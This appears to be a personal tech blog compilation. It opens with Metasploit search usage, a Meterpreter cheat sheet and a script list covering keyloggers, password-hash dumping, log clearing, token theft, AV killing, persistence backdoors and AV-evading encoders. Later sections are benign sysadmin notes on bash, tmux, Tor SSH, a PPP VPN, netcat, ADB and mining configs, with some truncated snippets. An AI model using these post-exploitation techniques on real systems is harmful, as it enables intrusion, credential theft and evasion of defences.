Auxiliary includes numerous modules (695) that don't fit into any of the other categories. These include such things as fuzzers, scanners, denial of service attacks, and more. Check out my article on auxiliary modules for more in-depth information on this module type.

Encoders are modules that enable us to encode our payloads in various ways to get past AV and other security devices. We can see the encoders by typing:

msf > show encoders

As you can see, there are numerous encoders built into Metasploit. One of my favorites is shikata_ga_nai, which allows us to XOR the payload to help make it undetectable by AV software and security devices.

Ever since Metasploit 4 was released, Metasploit has added search capabilities. Previously, you had to use msfcli and grep to find the modules you were looking for, but now Rapid7 has added the search keyword and features. The addition of the search capability was timely, as Metasploit has grown dramatically, and simple eyeball and grep searches were inadequate for searching over 1,400 exploits, for instance.

The search keyword enables us to do simple keyword searches, but it also allows us to be a bit more refined in our search as well. For instance, we can define what type of module we are searching for by using the type keyword.

msf > search type:exploit

When we do so, Metasploit comes back with all 1,295 exploits. Not real useful.

If we know we want to attack a Sun Microsystems machine running Solaris (Sun's UNIX), we may want to refine our search to Solaris exploits only. We can then use the platform keyword.

msf > search type:exploit platform:solaris

Now we have narrowed our search down to only those exploits that will work against a Solaris operating system.

To further refine our search, let's assume we want to attack Solaris RPC (sunrpc) and want to see only those exploits attacking that particular service. We can add the keyword "sunrpc" to our search like below:

msf > search type:exploit platform:solaris sunrpc

source :

Author: Harlok

2018-07-12 15:42:33

Command Cheat Sheet for Metasploit

Step 1: Core Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel

Step 2: File System Commands

cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim

Step 3: Networking Commands

ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table

Step 4: System Commands

clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name

Step 5: User Interface Commands

enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components

Step 6: Privilege Escalation Commands

getsystem - uses 15 built-in methods to gain sysadmin privileges

Step 7: Password Dump Commands

hashdump - grabs the hashes in the password (SAM) file

Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands

timestomp - manipulates the modify, access, and create attributes of a file

source :

Author: Harlok

2018-07-12 15:42:24

The Ultimate CLI List Metasploit

Script Commands with Brief Descriptions

arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Adds network routes through a Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox.
enum_logged_on_users.rb - Script for enumerating currently logged-on users and users that have logged in to the system.
enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vista, Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverse TCP Meterpreter payload into the memory of multiple PIDs; if none is provided, a notepad process will be created and a Meterpreter payload will be injected into each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb - This script will enumerate Windows hosts in the target environment, given a username and password or using the credentials under which Meterpreter is running, via the native Windows WMI tool (wmic).
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively searches for and downloads files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb - This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording, at intervals, the sound captured by the target host's microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates a Windows system, including environment variables, network interfaces, routing, user accounts, etc.
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.

source :

Author: Harlok

2018-07-12 15:42:14

Bash Arguments

- You can use $_ or !$ to recall the last argument of the previous command.
- Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.) !:1-2 !:10-12
- Similar to !$, you use !^ for the first argument.
- !$ - last argument from previous command
- !^ - first argument (after the program/built-in/script) from previous command
- !! - previous command (often pronounced "bang bang")
- !n - command number n from history
- !pattern - most recent command matching pattern
- !!:s/find/replace - last command, substitute find with replace
- Use !3:2 to take the second argument from the third command in the history.
- Use !-5:3 to take the third argument from the fifth last command in the history.
- !* runs a new command with all previous arguments.
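Related but distinct: the special parameter $_ also holds the previous command's last argument, and unlike the ! designators it works in non-interactive bash scripts too. A minimal sketch:

```shell
# $_ expands to the last argument of the previous command (bash).
mkdir -p /tmp/demo_dir
cd "$_"    # same as: cd /tmp/demo_dir
pwd        # → /tmp/demo_dir
```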

Event Designators

An event designator is a reference to a command line entry in the history list. Unless the reference is absolute, events are relative to the current position in the history list.


!
Start a history substitution, except when followed by a space, tab, the end of the line, ‘=’ or ‘(’ (when the extglob shell option is enabled using the shopt builtin).

!n
Refer to command line n.

!-n
Refer to the command n lines back.

!!
Refer to the previous command. This is a synonym for ‘!-1’.

!string
Refer to the most recent command preceding the current position in the history list starting with string.

!?string[?]
Refer to the most recent command preceding the current position in the history list containing string. The trailing ‘?’ may be omitted if the string is followed immediately by a newline.

^string1^string2^
Quick Substitution. Repeat the last command, replacing string1 with string2. Equivalent to !!:s/string1/string2/.

!#
The entire command line typed so far.

Word Designators

Word designators are used to select desired words from the event. A ‘:’ separates the event specification from the word designator. It may be omitted if the word designator begins with a ‘^’, ‘$’, ‘*’, ‘-’, or ‘%’. Words are numbered from the beginning of the line, with the first word being denoted by 0 (zero). Words are inserted into the current line separated by single spaces.

For example:

!!
designates the preceding command. When you type this, the preceding command is repeated in toto.

!!:$
designates the last argument of the preceding command. This may be shortened to !$.

!fi:2
designates the second argument of the most recent command starting with the letters fi.

Here are the word designators:

0 (zero)
The 0th word. For many applications, this is the command word.

n
The nth word.

^
The first argument; that is, word 1.

$
The last argument.

%
The word matched by the most recent ‘?string?’ search.

x-y
A range of words; ‘-y’ abbreviates ‘0-y’.

*
All of the words, except the 0th. This is a synonym for ‘1-$’. It is not an error to use ‘*’ if there is just one word in the event; the empty string is returned in that case.

x*
Abbreviates ‘x-$’.

x-
Abbreviates ‘x-$’ like ‘x*’, but omits the last word.

If a word designator is supplied without an event specification, the previous command is used as the event.


Modifiers

After the optional word designator, you can add a sequence of one or more of the following modifiers, each preceded by a ‘:’.

h
Remove a trailing pathname component, leaving only the head.

t
Remove all leading pathname components, leaving the tail.

r
Remove a trailing suffix of the form ‘.suffix’, leaving the basename.

e
Remove all but the trailing suffix.

p
Print the new command but do not execute it.

q
Quote the substituted words, escaping further substitutions.

x
Quote the substituted words as with ‘q’, but break into words at spaces, tabs, and newlines.

s/old/new/
Substitute new for the first occurrence of old in the event line. Any delimiter may be used in place of ‘/’. The delimiter may be quoted in old and new with a single backslash. If ‘&’ appears in new, it is replaced by old. A single backslash will quote the ‘&’. The final delimiter is optional if it is the last character on the input line.

&
Repeat the previous substitution.

g
Cause changes to be applied over the entire event line. Used in conjunction with ‘s’, as in gs/old/new/, or with ‘&’.

G
Apply the following ‘s’ modifier once to each word in the event.

Author: Harlok

2019-04-16 21:56:19

tmux Configuration

Start windows and panes at 1, not 0,

set -g base-index 1
set -g pane-base-index 1

Replace C-b with \,

unbind C-b
set -g prefix '\'
bind-key '\' send-prefix
set-window-option -g xterm-keys on

Setup key bindings,

bind-key r command-prompt -p "rename window to:" "rename-window '%%'"
bind t source-file ~/.tmux-over-ssh.conf
bind k confirm kill-window
bind K confirm kill-server

bind tab last-window

# window movement / renumbering like in screen's :number
bind-key m command-prompt -p "move window to:" "swap-window -t '%%'"

Enable UTF-8,

setw -g utf8 on
set -g status-utf8 on

setw -g window-status-current-format "|#I:#W|"

Makes using the scroll wheel automatically switch to copy mode and scroll back the tmux scrollback buffer.

set -g mouse on

Status bar,

set-option -g status-interval 60
set-option -g status-right-length 120
set -g status-right '#(date +"%a %b %_d %H:%M") | #(hostname)'
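The status-right above shells out to date(1) on every refresh; the format string can be previewed directly (%_d pads single-digit days with a space):

```shell
# Preview the timestamp used in the tmux status bar.
date +"%a %b %_d %H:%M"
```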

Create a new window, switch to the home directory, and type tmux-ssh:

neww -n tmux-ssh
send-keys -t tmux-ssh "cd ~/" C-m
send-keys -t tmux-ssh "tmux-ssh "

Create/attach a dev session: start tmux and create two windows running two emacs instances, one for editing and one for dired.

tmux has-session -t dev
if [ $? != 0 ]; then
  tmux new-session -s dev -n emacs -d
  tmux send-keys -t dev 'cd ~/' C-m
  tmux send-keys -t dev 'emacs -main-instance' C-m
  tmux new-window -n dired -t dev
  tmux send-keys -t dev 'cd ~/' C-m
  tmux send-keys -t dev 'emacs' C-m
fi
tmux attach -t dev

Solarized theme,

# default statusbar colors
set-option -g status-bg colour235 #base02
set-option -g status-fg colour136 #yellow
set-option -g status-attr default

# default window title colors
set-window-option -g window-status-fg colour244 #base0
set-window-option -g window-status-bg default
#set-window-option -g window-status-attr dim

# active window title colors
set-window-option -g window-status-current-fg colour166 #orange
set-window-option -g window-status-current-bg default
#set-window-option -g window-status-current-attr bright

# pane border
set-option -g pane-border-fg colour235 #base02
set-option -g pane-active-border-fg colour240 #base01

# message text
set-option -g message-bg colour235 #base02
set-option -g message-fg colour166 #orange

# pane number display
set-option -g display-panes-active-colour colour33 #blue
set-option -g display-panes-colour colour166 #orange

# clock
set-window-option -g clock-mode-colour colour64 #green

Author: Harlok

2018-06-22 08:14:59

SSH as a Hidden Service with Tor

Note to self, setup .torrc,

RunAsDaemon 1

HiddenServiceDir /home/tor/.hidden-ssh/
HiddenServicePort 22

Locate tor address,

cat ~/.hidden-ssh/hostname

Edit rc.local so tor starts during boot,

su - tor -c "/home/tor/Apps/tor/App/tor -f /home/tor/.torrc"

Edit SSH conf so it uses the SOCKS proxy for .onion addresses,

Host *.onion
ProxyCommand nc -x localhost:9050 -X 5 %h %p

and add hosts,

Host machine.onion
HostName dkflcfnvfkddjfkd.onion
Port 22

Author: Harlok

2019-04-16 22:12:49

Poor man's VPN using PPP over SSH

PPP (Point to Point Protocol) is a mechanism for running IP (Internet Protocol) over a terminal. Usually the terminal is a modem, but any tty will do. SSH creates secure ttys. Running a PPP connection over an SSH connection makes for an easy, encrypted VPN. (SSH has native tunneling support which requires root access, this method only requires root privileges on the client.)

If you run any flavor of *nix (Free/Open/NetBSD, Linux, etc.), chances are everything you need is already installed (ppp and ssh). And since SSH uses a single client/server TCP connection, it NATs cleanly, easily passing through firewalls and NAT routers. It has its drawbacks, though: you end up running PPP (TCP) inside SSH (TCP), which is a bad idea, since TCP-over-TCP tunnels degrade badly under packet loss.

On the remote end, install pppd if not already installed,

apt-get install ppp

Enable IP Forwarding by editing /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

Configure your iptables settings to enable access for PPP Clients,

iptables -F FORWARD
iptables -A FORWARD -j ACCEPT

iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE

And make sure you can login without a password.

On the local end, start pppd, tell it to connect using SSH in batch mode, start pppd on the remote server, and use the SSH connection as the communication channel.

pppd updetach defaultroute replacedefaultroute usepeerdns noauth passive pty \
"ssh root@$remote -o Batchmode=yes /usr/sbin/pppd nodetach notty noauth ms-dns"

When run, both your local and your remote computers will have new PPP network interfaces,

Local interface ppp0 with IP address
Remote interface ppp0 with IP address

Once pppd adds default route via ppp0 all traffic will be routed through the tunnel thus SSH will go down because OS will try to route the tunnel through the tunnel, to fix that we add a route to remote-host via local-gateway.

route add $remote gw $gateway

OS will send all SSH traffic to remote-host through our default gateway, so the tunnel keeps working fine, the rest of the traffic will go through the tunnel.

The script below automates all of the steps above, when run it will figure out the current gateway setup the tunnel and the routes so all traffic goes through the tunnel.



#!/bin/bash
# $remote must be set to the remote host, and $pidfile to the file where
# pppd records its pid.

gateway=$(/sbin/ip route | awk '/default/ { print $3 }')

# trap ctrl-c and signal pppd to shutdown
trap close_conn INT

function close_conn(){
    echo "Closing Connection."
    kill -HUP $pid
}

function setup_conn(){
    cd ~/
    echo "Current Gateway " $gateway
    route add $remote gw $gateway
    pppd updetach defaultroute replacedefaultroute usepeerdns noauth passive pty \
    "ssh root@$remote -o Batchmode=yes /usr/sbin/pppd nodetach notty noauth ms-dns"
    pid=`cat $pidfile`
    echo "Public Facing IP " `curl -s '' |
    sed 's/.*Current IP Address: \([ 0-9\.\.]*\).*/\1/g'`
}

setup_conn

while ps -p $pid > /dev/null; do
    sleep 1
    printf \
    "\rConnected For: %02d:%02d:%02d:%02d" \
    "$((SECONDS/86400))" "$((SECONDS/3600%24))" "$((SECONDS/60%60))" "$((SECONDS%60))"
done

route del $remote gw $gateway
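The gateway-extraction line at the top of the script can be sanity-checked in isolation. This sketch feeds the awk filter a hypothetical `ip route` output (the addresses are made up for the demo):

```shell
# Hypothetical `ip route` output; the awk filter picks the default gateway ($3).
sample='default via 192.168.1.1 dev eth0
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.10'
gateway=$(printf '%s\n' "$sample" | awk '/default/ { print $3 }')
echo "$gateway"   # -> 192.168.1.1
```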

Auteur : Harlok

2019-04-10 10:51:54

Using Netcat for File Transfers

Netcat is like a swiss army knife for geeks. It can be used for just about anything involving TCP or UDP. One of its most practical uses is to transfer files. Non-*nix people usually don't have SSH set up, and it is much faster to transfer stuff with netcat than to set up SSH. Netcat is just a single executable, and works across all platforms (Windows, Mac OS X, Linux).

On the receiving end running,

nc -l -p 1234 > out.file

will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

will connect to the receiver and begin sending file.

For faster transfers, if both sender and receiver have some basic *nix tools installed, you can compress the file during the sending process,

On the receiving end,

nc -l -p 1234 | uncompress -c | tar xvfp -

On the sending end,

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
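The same tar-and-compress pipeline can be tried locally, with the network replaced by a plain pipe (gzip stands in for compress here, since it is more commonly installed; the paths are made up for the demo):

```shell
# Pack a scratch directory, compress, decompress, unpack -- netcat would sit
# between the gzip and gunzip stages in the real transfer.
mkdir -p /tmp/nc_demo/src /tmp/nc_demo/dst
echo "hello" > /tmp/nc_demo/src/file.txt
tar cf - -C /tmp/nc_demo/src . | gzip -c | gunzip -c | tar xf - -C /tmp/nc_demo/dst
cat /tmp/nc_demo/dst/file.txt   # -> hello
```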

A much cooler but less useful trick: netcat can transfer an image of the whole hard drive over the wire using dd.

On the sender end run,

dd if=/dev/hda3 | gzip -9 | nc -l 3333

On the receiver end,

nc [destination] 3333 | pv -b > hdImage.img.gz

Be warned that file transfers using netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.

Auteur : Harlok

2018-06-22 08:12:26

What is ADB

ADB and fastboot commands on PC are used to perform different command line operations on device through USB in ROM/Recovery and bootloader mode respectively.
Android Debugging Bridge is basically used by developers to identify and fix bugs in OS (ROM). ADB works in ROM and recovery both.
Fastboot works in bootloader mode even when phone is not switched on in Recovery or ROM or even if android isn't installed on phone. In later case, bootloader can be accessed by certain button combination while powering on device; usually Power + Vol. Down.
Fastboot/ADB setup is to be made on PC to use this mode. ADB mode has more flexibility than fastboot as it supports more types of flashable files to be flashed. ADB also supports backing up Apps and Data. ADB/fastboot commands can be used to flash recovery and boot images. It can also flash ROM zip. It can flash by booting into recovery to gain root access. And above all, it is the only way to unlock bootloader without which the device functionality is too limited. Read here why we need to unlock bootloader.
In bootloader mode, usually boot logo appears on device screen.


Enable USB Debugging in Settings > Developer Options. If not available, Dev. Options can be revealed by tapping Build Number 5 (or 7) times in Settings > About Phone.
Allow ADB root access in Dev. Options or SuperSU. Some commands need root.
Allow data transfer over ADB when prompted on device screen. Otherwise you might get errors like device unauthorized etc. So keep screen unlocked at first connect.
Disable MTP, PTP, UMS etc. from USB computer connection on device to avoid any interruptions.
Install Android SDK or simply install 15 Seconds ADB Setup 1.4.2. It works up to Android Lollipop (AOSP 5). Credits to Snoop05
Windows 8.1 users who got error installing this setup should first install Windows Update KB2917929.
You will have to navigate to the adb folder each time you start cmd, or set up adb to work globally. On your PC, go to System Properties > Advanced System Settings > Environment Variables. Click on New (User Variables). Variable Name: ADB (or anything you want). Variable Value: ;C:\adb (if installed with the 15 seconds setup) or ;C:\SDK\platform-tools.
Install ADB USB Drivers for your Android Device. To do this automatically, download and run ADB Driver Installer. Connect device through USB cable and install drivers.
NOTE: Spaces in file paths don't work in adb commands. Non-English characters and languages don't work either. Also the commands are case-sensitive.

There is a long list of adb/fastboot commands to perform numerous operations. Here are a few of those being listed keeping in view certain tasks:

On PC run Command Prompt as Administrator.

To check connected devices when ROM is running on phone:

adb devices

To boot into bootloader mode:

adb reboot bootloader

To check connected devices when in bootloader mode:

fastboot devices

To boot into ROM:

fastboot reboot

To boot into recovery:

fastboot reboot recovery

There are some common Linux commands which can be used in combination with these commands to perform certain operation. However, ADB | FASTBOOT is not necessarily required for these Linux commands. These can be run directly from Terminal Emulator in ROM or Custom Recovery. Some of them are given below.

NOTE: Some newer devices don't allow unlocking of bootloader directly to ensure more security. Instead an official method is provided to unlock BL using PC.
Read here to know about the risks of BL unlocking.

To check the bootloader status:

fastboot oem device-info

“True” on unlocked status.
If "false", run the following to unlock:

fastboot oem unlock

This will erase your data.

fastboot format:ext4 userdata

It can be performed on other flash partitions as well. A general syntax is 'fastboot format:FS PARTITION'

Download recovery.img (specific for your device) to adb folder.
To test the recovery without permanently flashing, run the following:

fastboot boot recovery.img

On next reboot, the device returns to the previously installed recovery, since nothing was flashed.
Or to permanently flash recovery, run:

fastboot flash recovery recovery.img
fastboot reboot recovery

Stock ROMs often tend to replace custom recovery with the stock one on first reboot. That's why booting into recovery is recommended before booting into ROM.

Download boot.img (specific for your device) to adb folder and run following:

fastboot flash boot boot.img

Download the fastboot-flashable zip for your device, i.e. one containing android-info.txt and android-product.txt.
To wipe your device and then to flash .zip:

fastboot -w
fastboot update

GAIN ROOT (Not recommended method. Better flash directly through custom recovery).
Root is required to modify the contents of /system. You can read here further.
Download the flashable zip and a custom or modified recovery.img (one that supports flashing .zip files) to the adb folder and run the following:

fastboot boot recovery.img

Now once you are in recovery, adb will work instead of fastboot.
To copy files from PC to device and then to extract files, run the following:

adb push /tmp
adb shell /sbin/recovery --update_package=/tmp/

To backup and restore all apps and their data:

adb backup -apk -shared -all -system -f C:\backup.ab
adb restore C:\backup.ab

Read here for details.

This method can be used to backup whole device e.g. to backup /data/ including /data/media/ i.e. Internal SD Card which isn't backed up by custom recovery (TWRP). Or you can get any partition image for development purpose. This method retains complete directory structure as well as file permissions, attributes and contexts.

To jump from windows command prompt to android device shell:

adb shell

These commands can also be given from Recovery Terminal instead of ADB.
To get SuperUser access (in ROM):


To list all available partitions or mount points on device:

cat /proc/partitions

Or go to "/dev/block/platform/" folder on device. Search for the folder having folder "by-name" inside it. It's msm_sdcc.1 (on Nokia X2). Run the following:

ls -al /dev/block/platform/*/by-name

Or simply use DiskInfo app to get partition name you want to copy. Say you want to copy /data (userdata) partition. On Nokia X2DS, it is mmcblk0p25.
To confirm:

readlink /dev/block/bootdevice/by-name/userdata

Run the following to copy partition:

dd if=/dev/block/mmcblk0p25 of=/sdcard/data.img


cat /dev/block/mmcblk0p25 > /sdcard/data.img


dd if=/dev/block/bootdevice/by-name/userdata of=/sdcard/data.img

data.img will be copied to your SD card.
It also works inversely (restore):

dd if=/sdcard/data.img of=/dev/block/mmcblk0p25

data.img from your SD card will be written to device.
Similarly you can copy system.img, boot.img or any other partition. However, boot.img and some other partitions may not be copyable from a running ROM but only in recovery mode. So better use recovery for dd, except if you're going to dd the recovery partition itself. You can read here more about android partitions.
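The dd backup/restore round trip can be rehearsed on a scratch file standing in for the partition device (file names here are made up):

```shell
# Create a fake 4 KB "partition", image it, restore it, and compare.
dd if=/dev/urandom of=/tmp/fake_part bs=1024 count=4 2>/dev/null
dd if=/tmp/fake_part of=/tmp/part.img 2>/dev/null           # backup
dd if=/tmp/part.img of=/tmp/fake_part_restored 2>/dev/null  # restore
cmp -s /tmp/fake_part /tmp/fake_part_restored && echo "identical"   # -> identical
```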

COPY WHOLE FOLDER (within device)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).

To jump from windows command prompt to android device shell:

adb shell

These commands can also be given from Recovery Terminal.
To get SuperUser access (in ROM):
su


To copy from Internal Memory to SD Card:

cp -a /data/media/0/. /external_sd/internal_backup/

Or if you don't have SU permission:

cp -a /external_sd/. /sdcard/

To copy from SD Card to Internal Memory:

cp -a /external_sd/internal_backup/. /data/media/0/

However, if you are copying to an SD card with FAT32 file system, android permissions of files won't be retained and you would have to fix permissions yourself. In this case, you can use tar command to create archive of files along with their attributes ( permissions: mode & ownership + time-stamps) and security contexts etc. But FAT32 FS has also a limitations of 4GB maximum file size. You may use "split" command along with "tar" to split the archive in smaller blocks. Or use exFat or Ext4 filesystem for larger file support. Ext4 would give higher writing speed in Android but not supported in Windows i.e. SD card can't be mounted in Windows. MTP however works.
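The tar-plus-split combination can be sketched with tiny numbers, 1 KB chunks standing in for the 4 GB FAT32 limit (paths are made up for the demo):

```shell
# Split a tar stream into 1 KB pieces, then reassemble with cat and extract
# the member back to stdout to verify the byte count survived.
mkdir -p /tmp/split_demo && cd /tmp/split_demo
dd if=/dev/zero of=big.bin bs=1024 count=5 2>/dev/null
tar cf - big.bin | split -b 1k - part.
cat part.* | tar xOf - big.bin | wc -c   # -> 5120
```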
To jump from windows command prompt to android device shell:

adb shell

To get SuperUser access (in ROM):
su


To copy from Internal Memory to SD Card:

tar cvpf /external_sd/internal_backup/media.tar /data/media/0/

To extract from SD Card to Internal Memory (along with path):

tar -xvf /external_sd/internal_backup/media.tar

To extract from SD Card to some other location, use "-C":

tar -xvf /external_sd/internal_backup/media.tar -C /data/media/0/extracted_archive/

This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).

To copy from PC to device:

adb push \path\to\folder\on\PC\ /path/to/folder/on/device/

To copy from device to PC:

adb pull /path/to/folder/on/device/ \path\to\folder\on\PC\

After copying from PC to device's Internal Memory (/data/media/), you might get Permission Denied error e.g. apps can't write or even read from Internal Memory. It's because Android (Linux) and Windows have different file permissions system. To FIX PERMISSIONS, boot into recovery and run following commands:
(Credits to xak944 )

adb shell

To take ownership of whole "media" directory:

chown -R media_rw:media_rw /data/media/

To fix permissions of directories:

find /data/media/ -type d -exec chmod 775 '{}' ';'

To fix permissions of files:

find /data/media/ -type f -exec chmod 664 '{}' ';'
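The two find/chmod passes can be exercised on a scratch tree first (the path is made up for the demo):

```shell
# Apply the directory/file permission split, then show the resulting modes.
mkdir -p /tmp/perm_demo/sub && touch /tmp/perm_demo/sub/f.txt
find /tmp/perm_demo -type d -exec chmod 775 '{}' ';'
find /tmp/perm_demo -type f -exec chmod 664 '{}' ';'
stat -c '%a %n' /tmp/perm_demo/sub /tmp/perm_demo/sub/f.txt
# -> 775 /tmp/perm_demo/sub
# -> 664 /tmp/perm_demo/sub/f.txt
```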

Fastboot supports passing kernel options. For example, while booting a modified kernel image with FrameBuffer Console support, the console device and its font can be provided as options:

fastboot boot -c "console=tty0,115200 fbcon=font:VGA8x8" boot-fbcon.img

Auteur : Harlok

2019-04-16 22:33:27

Information gathering


Auteur : Harlok

2019-01-29 08:56:03

Vega profile

Vega 56
Monero, AEON, Electroneum, Sumokoin, etc.

Power saving

GPU P7 1407MHz, 950mV
Memory P3 950MHz, 900mV

XMR-STAK 2.x config

"gpu_threads_conf" : [
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 1,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 3, "strided_index" : true
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 1,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 5, "strided_index" : true
Overdriventool profile



Vega 64
Monero, AEON, Electroneum, Sumokoin, etc.

High performance

GPU P7 1500MHz, 1000mV
Memory P3 1175MHz, 950mV

Power saving

GPU P7 1407MHz, 860mV
Memory P3 1107MHz, 860mV

XMR-STAK 2.x config

"gpu_threads_conf" : [
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 0,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 5, "strided_index" : true
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 0,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 3, "strided_index" : true
Overdriventool profile


Auteur : Harlok

2019-04-16 22:11:19

Bash shortcut

Working With Processes
